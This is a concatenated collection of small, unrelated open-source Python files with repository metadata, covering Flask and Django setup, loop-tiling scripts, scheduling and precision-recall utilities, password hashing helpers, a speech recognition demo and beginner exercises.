refs/heads/master
| 2023-02-28T12:12:23.170118 | 2021-02-07T10:21:19 | 2021-02-07T10:21:19 | 271,981,338 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 532 |
py
|
from flask_script import Server
import sys
sys.path.append('../')
from application import manager
from application import app
import www
#manager.add_command("runserver",Server(port=app.config['SERVER_PORT'],use_debugger=True,use_reloader=True))
manager.add_command("runserver",Server(port=8999,use_debugger=True ,use_reloader=True))
def main():
manager.run()
if __name__ == "__main__":
try:
import sys
sys.exit(main())
except Exception as e:
import tranceback
tranceback.print_exc()
|
[
"[email protected]"
] | |
a8ba14a006fb88ac5415201cfab9678983738d9d
|
b47f2e3f3298388b1bcab3213bef42682985135e
|
/experiments/fdtd-2d/tmp_files/2238.py
|
6dfcdd1cd9629a3c959c2e3b61310de6617d05bf
|
[
"BSD-2-Clause"
] |
permissive
|
LoopTilingBenchmark/benchmark
|
29cc9f845d323431e3d40e878cbfc6d1aad1f260
|
52a3d2e70216552a498fd91de02a2fa9cb62122c
|
refs/heads/master
| 2020-09-25T09:45:31.299046 | 2019-12-04T23:25:06 | 2019-12-04T23:25:06 | 225,975,074 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 411 |
py
|
from chill import *
source('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/polybench/polybench-code/stencils/fdtd-2d/kernel.c')
destination('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/experiments/fdtd-2d/tmp_files/2238.c')
procedure('kernel_fdtd_2d')
loop(0)
known(' nx > 1 ')
known(' ny > 1 ')
tile(1,2,20,2)
tile(1,4,16,4)
tile(2,2,20,2)
tile(2,4,16,4)
tile(3,2,20,2)
tile(3,4,16,4)
|
[
"[email protected]"
] | |
e1fb60594b9677bac8acc8141bfa22fb1dceca1e
|
e8734347fbd04af9372c532627271cd163594378
|
/registration/models.py
|
fbd2602b7b028b1b9768cb917ebadc6f735bb692
|
[] |
no_license
|
sreeja-g/ichoose_e_commerce
|
fcbb539d6a1667cc429f5de17a25155b92d3ef71
|
fa8935f6cb078d83a2461cd17dca7087e33140ee
|
refs/heads/master
| 2020-12-23T19:54:03.933418 | 2020-03-07T21:21:38 | 2020-03-07T21:21:38 | 237,254,799 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 454 |
py
|
from djongo import models
from django.contrib.auth.models import AbstractUser
class User(AbstractUser):
mobile = models.CharField(max_length=16)
address = models.TextField()
bank_details=models.TextField()
verification_status=models.BooleanField(default=False)
verification_applied = models.BooleanField(default=False)
email = models.EmailField(max_length=254, unique=True)
def __str__(self):
return self.username
|
[
"[email protected]"
] | |
694debae9d0c3be37bb1ceb195eb5416f77e203d
|
8bc02f1e939c5802606f1776afe28e7288521c3a
|
/mifiel/document.py
|
e2d0d024da5d40e0a7bc3b3a2d7f12dc40d398e5
|
[
"MIT"
] |
permissive
|
krriyo/python-api-client
|
4b224e5025f191c1494808655b18f14aedde2a3a
|
fb4e37382ca9e2f65e36d344d91c4edafeeec1dd
|
refs/heads/master
| 2021-01-16T19:53:32.110635 | 2016-06-13T15:08:05 | 2016-06-13T15:10:23 | 61,143,710 | 0 | 0 | null | 2016-06-14T17:51:14 | 2016-06-14T17:51:14 | null |
UTF-8
|
Python
| false | false | 827 |
py
|
from mifiel import Base
class Document(Base):
def __init__(self, client):
Base.__init__(self, client, 'documents')
@staticmethod
def find(client, doc_id):
doc = Document(client)
doc.process_request('get', url=doc.url(doc_id))
return doc
@staticmethod
def create(client, signatories, file=None, dhash=None, callback_url=None):
if not file and not dhash:
raise ValueError('Either file or hash must be provided')
if file and dhash:
raise ValueError('Only one of file or hash must be provided')
data = { 'signatories': signatories }
if callback_url:
data['callback_url'] = callback_url
if file:
data['file'] = open(file)
if dhash:
data['original_hash'] = dhash
doc = Document(client)
doc.process_request('post', data=data)
return doc
|
[
"[email protected]"
] | |
c4730fe7b6b349a796fd414431f490ab99e64b94
|
1cc79da2b428403981b145c4ba2934c85e73440b
|
/code/load_instance.py
|
e6221bfb7d938b9836a9b759c8bbc673a72c82f2
|
[] |
no_license
|
Iggytung/two-stage-robust-RCPSP
|
3bd41b264a208bdf28ed76e9f9cb849a1c8540b7
|
94e7bc23e0ee82574335f11850a554766a85f673
|
refs/heads/master
| 2023-01-13T07:01:28.679534 | 2020-11-12T14:19:05 | 2020-11-12T14:19:05 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,990 |
py
|
import re
import os
def load_instance(path_to_file):
f = open(path_to_file, 'r')
raw_lines = f.read().splitlines()
f.close()
data = {'E':{}, 'd':[], 'r':[]}
line_counter = 0
for line in raw_lines:
ints = list(map(int, re.findall(r'\d+', line))) #list of integers in line
if len(ints) == 0:
line_counter += 1
continue
else:
if line_counter < 18:
if 'jobs' in line:
data['n'] = int(ints[0]) #number of activities (incl. dummy act's 0, n+1)
elif 'horizon' in line:
data['T'] = int(ints[0]) #UB on makespan
elif '- renewable' in line:
data['n_res'] = int(ints[0])
elif 18 <= line_counter < 18+data['n']:
jobnr = int(ints[0])-1
data['E'][jobnr] = [int(succ)-1 for succ in ints[3:]] #ints[3:] = successors
elif 18+data['n']+4 <= line_counter < 18+2*data['n']+4:
data['d'].append(int(ints[2]))
data['r'].append([int(x) for x in ints[3:]])
elif line_counter == 18+2*data['n']+4+3:
data['R'] = [int(x) for x in ints]
line_counter += 1
activities = {}
for j in range(data['n']):
pred = [i for i in range(j) if j in data['E'][i]]
act = Activity(j, pred, data['E'][j], data['d'][j], data['r'][j])
activities[j] = act
project_name = os.path.basename(os.path.normpath(os.path.splitext(path_to_file)[0]))
project = Project(project_name, activities, data['R'], data['T'])
return project
class Activity():
def __init__(self, id, pred, succ, d, r):
self.id = id
self.pred = pred #predecessors
self.succ = succ #successors
self.d = d #duration
self.r = r #resource requirement
class Project():
def __init__(self, name, act, R, T):
self.name = name
self.act = act
self.V = [i for i in act] #activities
self.E = [(i,j) for i in self.V for j in act[i].succ] #edges
self.n = len(act)-2 #number of non-dummy activities
self.R = R #resource availability
self.K = range(len(R))
self.T = T #UB on makespan (sum of activity durations)
self.forward_pass()
self.backward_pass()
#computes ES and EF for each activity
def forward_pass(self):
n = self.n
self.act[0].ES = 0
self.act[0].EF = 0
for j in range(1,n+2):
self.act[j].ES = max(self.act[i].EF for i in self.act[j].pred)
self.act[j].EF = self.act[j].ES + self.act[j].d
#computes LF and LS for each activity
def backward_pass(self):
n = self.n
self.act[n+1].LF = self.T
self.act[n+1].LS = self.T
for j in range(n,-1,-1):
self.act[j].LF = min(self.act[i].LS for i in self.act[j].succ)
self.act[j].LS = self.act[j].LF - self.act[j].d
|
[
"[email protected]"
] | |
f4fe9baf658f7699c56553c9b11e5a857db45443
|
f5e028f74d682da8b299c2bac3abb825ee689594
|
/groups/migrations/0005_grouppost.py
|
776b055a2f6e5d840d8eada6fa255f2656c16f36
|
[] |
no_license
|
pidoxy/Insight
|
ac0bd5641d3e59d633b1b62293017b7069107ebc
|
c7abf64ef425d96af887abd220c90c340970410c
|
refs/heads/main
| 2023-07-12T03:18:16.520733 | 2021-08-16T09:20:49 | 2021-08-16T09:20:49 | 396,128,334 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,277 |
py
|
# Generated by Django 3.2 on 2021-05-26 18:07
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('groups', '0004_rename_profile_background_group_cover'),
]
operations = [
migrations.CreateModel(
name='GroupPost',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.TextField()),
('image', models.ImageField(blank=True, null=True, upload_to='uploads/groupposts')),
('timestamp', models.DateTimeField(auto_now=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='posts', to=settings.AUTH_USER_MODEL)),
('group', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='groupposts', to='groups.groupmember')),
],
options={
'ordering': ['-timestamp'],
'unique_together': {('author', 'content')},
},
),
]
|
[
"[email protected]"
] | |
1d21b813ebb1d0d0419342b2aedcf2c3f52774cf
|
d157356a92d6fee8665d66cfe6b270c8f18f9159
|
/ex_python/ex_1_100/exercise_16_20.py
|
e7010bd8078fb7e4ff8ba92093247459bff9a305
|
[] |
no_license
|
ycl-initVersion/ExerciseCodeCollect
|
a52622c16f51d9189293bb854b7711223f6f9c77
|
11b9c8fce262a2c6f9b43d10c1c03fa994068d53
|
refs/heads/master
| 2021-01-18T06:09:27.000140 | 2016-09-19T06:25:24 | 2016-09-19T06:25:24 | 68,558,652 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,505 |
py
|
#example 16
'''
import datetime
if __name__ == '__main__':
print(datetime.date.today().strftime('%d/%m/%Y'))
miyazakiBirthDate = datetime.date(1941,1,5)
print(miyazakiBirthDate.strftime('%d/%m/%Y'))
miyazakiBirthNextDay = miyazakiBirthDate + datetime.timedelta(days=1)
print(miyazakiBirthNextDay.strftime('%d/%m/%Y'))
miyazakiFirstBirthDate = miyazakiBirthDate.replace(year=miyazakiBirthDate.year+1)
print(miyazakiFirstBirthDate.strftime('%d/%m/%Y'))
'''
#example 17
'''
import string
s = raw_input('input a string:\n')
letters = 0
space = 0
digit = 0
others = 0
for c in s:
if c.isalpha():
letters += 1
elif c.isspace():
space += 1
elif c.isdigit():
digit += 1
else:
others += 1
print 'char = %d,space = %d,digit = %d,others = %d' %(letters,space,digit,others)
'''
#exaple 18
'''
Tn = 0
Sn = []
n = int(raw_input('n = :\n'))
a = int(raw_input('a= :\n'))
for count in range(n):
Tn = Tn + a
a = a * 10
Sn.append(Tn)
print Tn
Sn = reduce(lambda x,y:x + y,Sn)
print Sn
'''
#example 19
'''
from sys import stdout
for j in range(2,1001):
k = []
n = -1
s = j
for i in range(1,j):
if j % i == 0:
n += 1
s -= i
k.append(i)
if s == 0:
print j
for i in range(n):
stdout.write(str(k[i]))
stdout.write(' ')
print k[n]
'''
#example 20
Sn = 100.0
Hn = Sn / 2
for n in range(2,11):
Sn += 2*Hn
Hn /=2
print 'total of road is %f' %Sn
print 'the tenth of %f meter' %Hn
|
[
"[email protected]"
] | |
b854b2f33147ed15e806a984140b33a8a77e76fe
|
562384347373c3ae872a380e3d2363fbbbe0a5b3
|
/mpr_curves.py
|
c69ac35e2b899d12803af5570e2c60bf74299c74
|
[] |
no_license
|
XingCui666/scripts
|
22df26d072648557bdddc66c93d52d45bab64c7e
|
4f7488fd37ff0bf4f9bf78e93711a058885655c7
|
refs/heads/master
| 2022-04-14T15:46:24.407738 | 2020-03-24T04:30:53 | 2020-03-24T04:30:53 | 159,750,624 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,172 |
py
|
# Created by Kuan Li
import json
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from tqdm import tqdm
import sys
import os
IOU_TH_50 = 0.5
IOU_THS = [i / 20 + 0.5 for i in range(9, -1, -1)]
class Dt:
def __init__(self, img_id, score, bbox, mode="mPR"):
"""
single dt
:param img_id:
:param score: a list of score
:param bbox: bbox
"""
self.img_id = img_id
self.score = score
self.bbox = bbox
if mode == "PR50":
self.is_match = False
else:
self.is_match = [False for _ in range(9, -1, -1)] # 0.95-->0.5
class Gt:
def __init__(self, img_id, bbox, mode="mPR"):
"""
a gt contains a list of gt bboxes
:param img_id:
:param bbox: a list of bboxes
"""
self.img_id = img_id
self.bbox = bbox
if mode == "PR50":
self.is_match = False
else:
self.is_match = [False for _ in range(9, -1, -1)] # 0.95-->0.5
def compute_iou(bbox1, bbox2):
x1, y1, w1, h1 = bbox1
x2, y2, w2, h2 = bbox2
s_sum = w1 * h1 + w2 * h2
left = max(x1, x2)
right = min(x1 + w1, x2 + w2)
top = max(y1, y2)
bottom = min(y1 + h1, y2 + h2)
if left >= right or top >= bottom:
return 0
intersect = (right - left) * (bottom - top)
return intersect / (s_sum - intersect)
def prepare_gt_and_dt(gt_path, dt_path, c_id):
"""
:param gt_path: gt path
:param dt_path: dt path
:param c_id: category_id
:return: gt dict and dt list
"""
with open(gt_path, "r") as f:
gt = json.load(f)
gt_objs = gt["annotations"]
gt_imgs = gt["images"]
gt_objs = [an for an in gt_objs if an["category_id"] == c_id]
gt_num = len(gt_objs)
gt_dic = dict() # key: image_id value: a list of Gt
for demo in gt_objs:
if demo["image_id"] in gt_dic:
tmp = Gt(img_id=demo["image_id"], bbox=demo["bbox"], mode=mode)
gt_dic[demo["image_id"]].append(tmp)
else:
gt_dic[demo["image_id"]] = [Gt(img_id=demo["image_id"], bbox=demo["bbox"], mode=mode)]
# TODO image_id_set should from "images", not "annotations", Done.
# image_id_set = gt_dic.keys() #
image_id_set = set([im["id"] for im in gt_imgs])
with open(dt_path, "r") as f:
dt_objs = json.load(f)
dt_objs = [demo for demo in dt_objs
if demo["category_id"] == c_id and demo["image_id"] in image_id_set]
dt_list = list()
for demo in dt_objs:
dt_list.append(Dt(img_id=demo["image_id"], score=demo["score"], bbox=demo["bbox"], mode=mode))
return gt_dic, dt_list, gt_num
def match_dt_2_gt(single_dt, gts, mode="mPR"):
"""
:param single_dt:
:param gts: a list of gt
:param mode:
:return:
"""
if mode == "PR50":
max_iou = 0
max_index = -1
for index, gt in enumerate(gts):
if not gt.is_match:
cur_iou = compute_iou(single_dt.bbox, gt.bbox)
if cur_iou >= IOU_TH_50 and max_iou < cur_iou:
max_index = index
max_iou = cur_iou
if max_index >= 0:
single_dt.is_match = True
gts[max_index].is_match = True
else:
for thres_index, thres in enumerate(IOU_THS): #first match high score
max_iou = 0
max_index = -1
for index, gt in enumerate(gts):
if not gt.is_match[thres_index]:
cur_iou = compute_iou(single_dt.bbox, gt.bbox)
if cur_iou >= thres and max_iou < cur_iou:
max_index = index
max_iou = cur_iou
if max_index >= 0:
single_dt.is_match[thres_index] = True
gts[max_index].is_match[thres_index] = True
def run_match(dt_list, gt_dict, mode):
"""
:param dt_list: a list of Dt class
:param gt_dict: key: image_id value: Gt class
:return:
"""
dt_list.sort(key=lambda x: x.score, reverse=True)
# sorted(dt_list, key=lambda x: x.score)
print("matching dt to gts...")
for single_dt in tqdm(dt_list):
img_id = single_dt.img_id
# TODO img_id is exists ? Done.
if img_id in gt_dic:
match_dt_2_gt(single_dt, gt_dict[img_id], mode=mode)
def get_recalls_and_precisions(dt_list, gt_num, mode="mPR"):
"""
recall: tp / gt_all; precision: tp/ dt_all
:param dt_list:
:param gt_num:
:return:
"""
if mode == "PR50":
is_match = [dt.is_match for dt in dt_list]
scores = [dt.score for dt in dt_list]
tp_list = []
cur_tp = 0
for match in is_match:
if match:
cur_tp += 1
tp_list.append(cur_tp)
recalls = [(tp / gt_num) * 100 for tp in tp_list]
precisions = [(tp / (index + 1)) * 100 for index, tp in enumerate(tp_list)]
return recalls, precisions, scores
else:
recalls_all = [0 for _ in dt_list]
precisions_all = [0 for _ in dt_list]
scores = [dt.score for dt in dt_list]
for index, thres in enumerate(IOU_THS):
is_match = [dt.is_match[index] for dt in dt_list]
tp_list = []
cur_tp = 0
for match in is_match:
if match:
cur_tp += 1
tp_list.append(cur_tp)
recalls = [(tp / gt_num) * 100 for tp in tp_list]
precisions = [(tp / (index + 1)) * 100 for index, tp in enumerate(tp_list)]
recalls_all = [recalls_all[i]+recalls[i] for i in range(len(dt_list))]
precisions_all = [precisions_all[i]+precisions[i] for i in range(len(dt_list))]
recalls_all = [recall/len(IOU_THS) for recall in recalls_all]
precisions_all = [precision/len(IOU_THS) for precision in precisions_all]
return recalls_all, precisions_all, scores
def get_thres_index(scores, score_thres):
indics = []
for thres in score_thres:
for index, score in enumerate(scores):
if score < thres:
indics.append(index)
break
return indics
if __name__ == '__main__':
gt_coco = sys.argv[1]
result1_json = sys.argv[2]
result2_json = sys.argv[3]
benchmark = sys.argv[4]
gt_path = gt_coco
dt_paths = [result1_json, result2_json]
colors = ['red', 'green', 'blue', "cyan", "brown", "black", "orange"] # default color
labels = ['v6.1_nnie', 'v6.2_nnie'] # same length as dt_paths
c_id = 1 # filter category_id
c_labels = {1: "body", 2: "head", 3: "face"}
mode = "mPR" # mPR or PR50
#score_thres = [0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2] # suggestion: descend, plot some key points
#score_marker = ["o", "v", "+", "s", ">", "*", "<"] # marker
score_thres = [0.8, 0.7, 0.6, 0.5] # suggestion: descend, plot some key points
score_marker = ["o", "v", "+", "s"] # marker
for index, dt_path in enumerate(dt_paths):
print("handling {} prlines...".format(labels[index]))
gt_dic, dt_list, gt_num = prepare_gt_and_dt(gt_path, dt_path, c_id)
run_match(dt_list, gt_dic, mode=mode)
recalls, precisions, scores = get_recalls_and_precisions(dt_list, gt_num, mode=mode)
plt.plot(recalls, precisions, linewidth=0.8, color=colors[index], label=labels[index])
indics = get_thres_index(scores, score_thres)
for i, num in enumerate(indics):
plt.scatter(recalls[num], precisions[num], c=colors[index], linewidths=1, marker=score_marker[i])
start_pos = (5, 75)
for i, score in enumerate(score_thres):
plt.text(start_pos[0], start_pos[1]-2*i, "score: {} --> {}".format(score, score_marker[i]))
plt.legend()
plt.xlabel("recalls")
plt.ylabel("precisions")
title = c_labels[c_id] if c_id in c_labels else "unknown"
des_saved = "./prlines_{}_test_{}.png".format(title, benchmark)
plt.title("{} {} on {}".format(title, mode, benchmark))
plt.savefig(des_saved)
plt.show()
print("done")
|
[
"[email protected]"
] | |
3ec8c9a9aafd5ce250c96413e44240d1a277bb9b
|
e8bfb2f17d014d2d71325192ec16385d6e504980
|
/sample_run_12.py
|
b489f2f2315c548ccb85cb43037ff04e1368ec7d
|
[] |
no_license
|
HarikrishnanBalagopal/useful_scripts
|
7fabaa7bd7d041cbce1d53b83424300a4ae39944
|
33e2d27e8cc2143b4392b7a06168a4112f9b614e
|
refs/heads/master
| 2022-08-02T03:30:32.748904 | 2020-06-03T14:36:18 | 2020-06-03T14:36:18 | 267,655,704 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,813 |
py
|
import os
import json
import torch
import numpy as np
import matplotlib.pyplot as plt
from torch import nn, optim
from tqdm.notebook import tqdm
from scipy.stats import truncnorm
from argparse import ArgumentParser
from text_encoder import TextEncoder
from text_decoder import TextDecoder
from easydict import EasyDict as edict
from fast_self_bleu import all_self_bleu
from fast_bleu import all_bleu_with_common_refs
from latent_discriminator import LatentDiscriminator, SimpleLatentDiscriminator
from latent_generator import LatentGenerator, SimpleLatentGenerator1, SimpleLatentGenerator2
from text_datasets import get_quora_texts_pretrained_vocab, get_emnlp_2017_news_pretrained_vocab
from utils import to_one_hot, QUORA_TEXT_PRETRAINED_VOCAB_VALID_SET_PATH, EMNLP_2017_NEWS_PRETRAINED_VOCAB_VALID_SET_PATH
def run(args):
d_batch = 512
d_noise = 100
d_vocab = 27699
d_gen_layers = 1
gen_dropout = 0.5
d_max_seq_len = 26
d_gen_hidden = 512
d_dis_hidden = 512
d_text_feature = 512
d_text_enc_cnn = 512
d_text_enc_cnn = 512
text_enc_dropout = 0.5
output_dir = args.output_dir
interpolation_steps = d_batch
lat_gen_weights_path = args.weights_path
text_enc_weights_path = 'new_text_enc.pth'
text_dec_weights_path = 'faster_text_gen_v1.pth'
truncation_threshold = args.truncation_threshold
if truncation_threshold is not None:
assert truncation_threshold > 0.0, f'truncation_threshold must be positive'
truncated_normal = truncnorm(-truncation_threshold, truncation_threshold)
print('using truncation trick with threshold:', truncation_threshold)
os.makedirs(output_dir, exist_ok=True)
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
dataset, loader = get_quora_texts_pretrained_vocab(split='train', d_batch=d_batch, should_pad=True, pad_to_length=d_max_seq_len)
assert d_vocab == dataset.d_vocab
end_token = dataset.end_token
text_dec = TextDecoder(d_vocab=d_vocab, d_text_feature=d_text_feature, d_gen_hidden=d_gen_hidden, d_max_seq_len=d_max_seq_len, d_gen_layers=d_gen_layers, gen_dropout=gen_dropout, pad_token=dataset.pad_token, start_token=dataset.start_token, end_token=dataset.end_token).to(device)
text_dec.load_state_dict(torch.load(text_dec_weights_path))
lat_gen = LatentGenerator(d_noise=d_noise, d_text_feature=d_text_feature, d_gen_hidden=d_gen_hidden).to(device)
lat_gen.load_state_dict(torch.load(lat_gen_weights_path))
# lat_gen = SimpleLatentGenerator1(d_noise=d_noise, d_text_feature=d_text_feature, d_gen_hidden=d_gen_hidden).to(device)
# lat_gen = SimpleLatentGenerator2(d_noise=d_noise, d_text_feature=d_text_feature, d_gen_hidden=d_gen_hidden).to(device)
text_dec.eval()
lat_gen.eval()
def remove_helper(xs):
xs = xs[1:]
for i, x in enumerate(xs):
if x == end_token:
return xs[:i]
return xs
def remove_special_tokens(xss):
if isinstance(xss, torch.Tensor):
xss = xss.tolist()
return [remove_helper(xs) for xs in xss]
def get_avg_std_bleu(xss):
xss = list(zip(*xss))
return [(np.mean(xs), np.std(xs)) for xs in xss]
print('generate fake texts:')
fake_text_ints = []
fake_text_strs = []
num_generated = 0
num_samples = args.num_samples
with torch.no_grad():
while num_generated < num_samples:
if truncation_threshold is not None:
noises = torch.tensor(truncated_normal.rvs((d_batch, d_noise)), dtype=torch.float, device=device)
else:
noises = torch.randn(d_batch, d_noise, device=device)
fake_texts = text_dec(lat_gen(noises))[0]
fake_text_ints.extend(fake_texts.tolist())
fake_text_strs.extend([dataset.decode_caption(fake_text) for fake_text in fake_texts.cpu()])
num_generated += d_batch
print('\n'.join(fake_text_strs[:4]))
with open(f'{output_dir}/fake_texts.txt', 'w') as f:
f.write('\n'.join(fake_text_strs))
fake_text_ints = remove_special_tokens(fake_text_ints)
torch.save(fake_text_ints, f'{output_dir}/fake_texts.pth')
print('DONE!')
def parse_args():
parser = ArgumentParser()
parser.add_argument('-w', dest='weights_path', type=str, required=True, help='path to weights')
parser.add_argument('-o', dest='output_dir', type=str, required=True, help='output folder name')
parser.add_argument('--truncation_threshold', type=float, default=None, help='threshold for the truncation trick, default is no truncation.')
parser.add_argument('-n', dest='num_samples', type=int, default=5000, help='number of samples to generate')
return parser.parse_args()
if __name__ == '__main__':
run(parse_args())
|
[
"[email protected]"
] | |
df3ee582d21448c9b6a5b04bf4e9f86b698c7454
|
85ce8600a5857ab8bd19f425b25fb1ac3a6ae137
|
/hashing.py
|
4edf11db744cf34e6e27e432622dd34fea0f8dba
|
[] |
no_license
|
styopazharkov/dontsaypineapple
|
c38c713361f642c9a77f3cde9f40120e26ab960d
|
1e96f5570a61cf45ccdc6a6125e363485ad2e85f
|
refs/heads/master
| 2023-08-25T20:17:33.080680 | 2021-11-07T19:36:45 | 2021-11-07T19:36:45 | 317,384,759 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 915 |
py
|
#### This file contains the hashing helper functions ####
import hashlib, binascii, os
### Hash a password for storing. ###
def hashpass(password):
salt = hashlib.sha256(os.urandom(60)).hexdigest().encode('ascii')
pwdhash = hashlib.pbkdf2_hmac('sha512', password.encode('utf-8'),
salt, 100000)
pwdhash = binascii.hexlify(pwdhash)
return (salt + pwdhash).decode('ascii')
### Verify a stored password against one provided by user ###
def verify(provided_password, stored_password):
salt = stored_password[:64]
stored_password = stored_password[64:]
pwdhash = hashlib.pbkdf2_hmac('sha512',
provided_password.encode('utf-8'),
salt.encode('ascii'),
100000)
pwdhash = binascii.hexlify(pwdhash).decode('ascii')
return pwdhash == stored_password
|
[
"[email protected]"
] | |
71b2e819f9b87e7fec810e93dc2fb3d1006ac89d
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_combos.py
|
cac18802b80f0f4ecc83aabd2e7d23ba1ed8481a
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 231 |
py
|
from xai.brain.wordbase.nouns._combo import _COMBO
#calss header
class _COMBOS(_COMBO, ):
def __init__(self,):
_COMBO.__init__(self)
self.name = "COMBOS"
self.specie = 'nouns'
self.basic = "combo"
self.jsondata = {}
|
[
"[email protected]"
] | |
7f573440117d22c0ac92c4425d4cb2d7b491ddf6
|
a7baf83cd25be7a9ba95bb43945fab5c17766d5a
|
/search/views.py
|
3ebadf75ff8cbc666f82e42b7049073e32d75ae0
|
[] |
no_license
|
sanjeev-mystical/eCOMMERCE
|
a44829d74749b92b5139629a41f8dee342e62882
|
f5648ebb3a580f466034ccf6c6c41181dbd8de5e
|
refs/heads/master
| 2022-06-08T03:42:01.899611 | 2020-05-05T04:55:27 | 2020-05-05T04:55:27 | 259,207,150 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 671 |
py
|
from django.shortcuts import render
from django.views.generic.list import ListView
from products.models import Product
# Create your views here.
class SearchProductView(ListView):
template_name = 'search/view.html'
def get_context_data(self, *args, **kwargs):
context = super(SearchProductView, self).get_context_data(*args, **kwargs)
context['query'] = self.request.GET.get('q')
return context
def get_queryset(self, *args, **kwargs):
request = self.request
query = request.GET.get('q', None)
if query is not None:
return Product.objects.search(query)
return Product.objects.featured()
|
[
"[email protected]"
] | |
bd6651931aed58d7bfd2c1949c7dea3b99edfd6c
|
b685036280331fa50fcd87f269521342ec1b437b
|
/src/data_mining_demo/py_shuJuWaJue_ruMen_yu_ShiJian/chapter3/demo2.py
|
7e2ee679470b22f9af507b2f12f77a6431309659
|
[] |
no_license
|
chenqing666/myML_DM_Test
|
f875cb5b2a92e81bc3de2a0070c0185b7eacac89
|
5ac38f7872d94ca7cedd4f5057bb93732b5edbad
|
refs/heads/master
| 2022-02-26T01:52:06.293025 | 2019-09-20T06:35:25 | 2019-09-20T06:35:25 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 175 |
py
|
import pickle
import numpy as np
import pandas as pd
datafile = "./cleanedData.dai"
with open(datafile, 'rb') as file:
dataset = pickle.load(file)
print(dataset.head())
|
[
"[email protected]"
] | |
82812f0cb1ad89fee4e2c4ad453429f5b4e8cc8f
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_118/619.py
|
85060cf54efea0ef148ad0160403ca71cbb9b978
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 596 |
py
|
# -*- coding: utf-8 -*-
import sys
def is_palindrome(num):
s1 = str(num)
s2 = s1[::-1]
return s1 == s2
fair_numbers = []
for i in range(pow(10, 7)+1):
if is_palindrome(i):
num = i*i
if is_palindrome(num):
fair_numbers.append(num)
N = int(sys.stdin.readline())
for T in range(1, N+1):
min_val, max_val = map(int, sys.stdin.readline().strip().split())
ans = 0
for num in fair_numbers:
if num < min_val:
continue
if num > max_val:
break
ans += 1
print 'Case #%(T)s: %(ans)s' % locals()
|
[
"[email protected]"
] | |
f1f0346609c95cd9528fa736d70e63b6a54c6372
|
fe179646f3efc67c7d97e20d8bb23de4649cfd71
|
/ML/recording voice.py
|
8c565b500a537bb9d1a0da5d5f51a75ac24ddf69
|
[] |
no_license
|
Piyush-Ghotkar/DK287_PASUS_BML_MUNJAL_UNIVERSITY
|
dac0a7d40b2ea81e0a4b813b3654372c50b155c6
|
8dd008e45cd4506bae105c2041cf2e18388f9adf
|
refs/heads/master
| 2023-05-12T05:16:18.583087 | 2020-11-11T14:34:21 | 2020-11-11T14:34:21 | 283,998,494 | 0 | 0 | null | 2021-06-02T03:01:13 | 2020-07-31T09:42:09 |
ASP.NET
|
UTF-8
|
Python
| false | false | 492 |
py
|
import speech_recognition as sr #importing the library
r=sr.Recognizer()
with sr.Microphone() as source:
print('Start speaking')
audio = r.listen(source)
#with open('speech.wav','wb') as f:
#f.write(audio.get_wav_data())
print('Done listening, Processing.....')
print(audio)
print(r.recognize_google(audio))
try:
print('Text is:', r.recognize_google(audio))
inp= r.recognize_google(audio)
except:
print('error occured!')
pass
|
[
"[email protected]"
] | |
9fde6b1cc14c9a979633c4f2df97f24dca4d78bb
|
84290c584128de3e872e66dc99b5b407a7a4612f
|
/Supervised Learning with scikit-learn/Preprocessing and pipelines/Centering and scaling.py
|
c21eb26fe58bf9a8d53c990a24d3b0ab871dee0b
|
[] |
no_license
|
BautizarCodigo/DataAnalyticEssentials
|
91eddc56dd1b457e9e3e1e3db5fbbb2a85d3b789
|
7f5f3d8936dd4945ee0fd854ef17f04a04eb7b57
|
refs/heads/main
| 2023-04-11T04:42:17.977491 | 2021-03-21T19:05:17 | 2021-03-21T19:05:17 | 349,784,608 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 504 |
py
|
# Import scale
from sklearn.preprocessing import scale
# Scale the features: X_scaled
X_scaled = scale(X)
# Print the mean and standard deviation of the unscaled features
print("Mean of Unscaled Features: {}".format(np.mean(X)))
print("Standard Deviation of Unscaled Features: {}".format(np.std(X)))
# Print the mean and standard deviation of the scaled features
print("Mean of Scaled Features: {}".format(np.mean(X_scaled)))
print("Standard Deviation of Scaled Features: {}".format(np.std(X_scaled)))
|
[
"[email protected]"
] | |
dc83fcd6ae70daf74c6861eb3265743bad91efb8
|
6a111b290ef2bf08c9a64f9ea72e2cc5c910b0d0
|
